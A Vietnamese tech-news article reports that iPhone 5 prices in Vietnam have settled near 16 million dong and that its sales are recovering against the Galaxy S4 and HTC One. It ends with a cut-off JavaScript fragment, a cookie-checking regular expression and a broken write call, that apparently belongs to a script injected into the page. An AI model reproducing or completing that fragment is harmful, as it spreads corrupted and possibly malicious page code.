Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Giá iPhone 5 tại Việt Nam đã xuống mức thấp nhất

Giá iPhone 5 tại Việt Nam đã xuống mức thấp nhất

Theo các đầu mối buôn bán iPhone, giá bán iPhone 5 bản 16GB dao động ở mức 16 triệu đồng sẽ khó có thể thay đổi trong thời gian tới, ít nhất là cho đến khi iPhone thế hệ mới ra mắt.

Doanh số bán ra của iPhone mới nhất đang tăng trở lại

Kể từ khi ra mắt, có lẽ tháng 5 và 6 vừa qua là quãng thời gian khó khăn nhất đối với chiếc điện thoại của Apple tại thị trường Việt Nam. Đó cũng là thời điểm những ông lớn khác liên tục tung ra các sản phẩm như Sony Xperia Z, Samsung Galaxy S4 hay HTC One. Tuy nhiên, sang tháng 7 thì iPhone 5 đã vượt qua các đối thủ của mình khi tiếp tục là lựa chọn hàng đầu của người mua.

Tại các cửa hàng như iShop, iOne cho thấy, mặc dù doanh số bán ra của iPhone vào 2 tháng trước có phần sụt giảm thì đến thời điểm này đã tăng trở lại. Đại diện của các cửa hàng này cho biết, từ đầu tháng 7 trở lại đây, trung bình mỗi ngày có không dưới 10 chiếc iPhone 5 được bán ra tại cửa hàng của mình.

iPhone 5 vẫn được lòng hơn so với Galaxy S4 và HTC One

Việc iPhone 5 lấy lại phong độ, sức mua của người dùng dành cho các đối thủ Samsung Galaxy S4 hay HTC đều bị ảnh hưởng đáng kể. Theo đó, lượng khách hàng mua những mẫu điện thoại này đã giảm đi trông thấy. Tính đến gần cuối tháng 7, lượng bán ra đã thấp hơn hẳn so với iPhone 5. Tính trung bình tại các cửa hàng lớn thì mỗi ngày Galaxy S4 và cả HTC One tiêu thụ từ 3 -4 máy.

Chủ cửa hàng của một cửa hàng kinh doanh iPhone trên Xã Đàn cho biết, phần lớn người dùng vẫn coi smartphone của Apple là lựa chọn hàng đầu khi họ muốn mua một chiếc điện thoại đắt tiền. Mặc dù có hơi lép vế hơn so với Galaxy S4 và HTC One tại thời điểm 2 sản phẩm này mới ra mắt, nhưng xét về đảng cấp trong mắt người dùng thì iPhone vẫn hơn hẳn. Chính vì vậy, việc iPhone thế hệ mới được ưa chuộng trở lại cũng không có gì là xa lạ.

Giá iPhone 5 đã “kịch sàn”

Nếu so với 1 tháng trước đây thì mức giá của iPhone 5 đã giảm nhẹ khoảng 100.000 – 200.000 đồng. Tại các cửa hàng có uy tín hoặc đại lý điện thoại lớn đang ở tầm 16 triệu đồng cho bản 16GB, trong khi đó hàng xách tay chỉ ở còn trung bình 14.5 triệu. Tuy nhiên, các đầu mối này đều khẳng định, mức giá trên sẽ không thay đổi trong thời gian tới, ít nhất là cho đến khi iPhone thế hệ mới ra mắt.

Với mức giá trên, kể cả hàng công ty hay hàng xách tay, iPhone 5 đều xấp xỉ 1 triệu đồng so với Galaxy S4 hay HTC One. Và đây được xem là một trong nhưng nguyên nhân dẫn tới việc người mua quay  sang lựa chọn chiếc smartphone của Apple.

Giá iPhone 5 sẽ ít biến động trong thời gian tới

Để cạnh tranh với mức giá chênh lệch 1.5 triệu đồng với hàng xách tay, các cửa hàng lớn vẫn chủ yếu dựa vào uy tín lâu năm và chế độ bảo hành có chất lượng. Các nguồn buôn bán nhỏ cũng đã liên tục tung ra các chương trình khuyến mãi tấm dán màn hình, phụ kiện hay chế độ cài nhạc, phim, phần mềm vĩnh viễn.

Giới kinh doanh iPhone đã nhận định, việc iPhone 5 lật ngược thế cờ trước Galaxy S4 Và HTC One là điều có thể dễ dàng đoán được từ trước. Nhưng khả năng điều tương tự xảy ra đối với 2 sản phẩm của Samsung và HTC là không thể trong thời gian tới.

(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘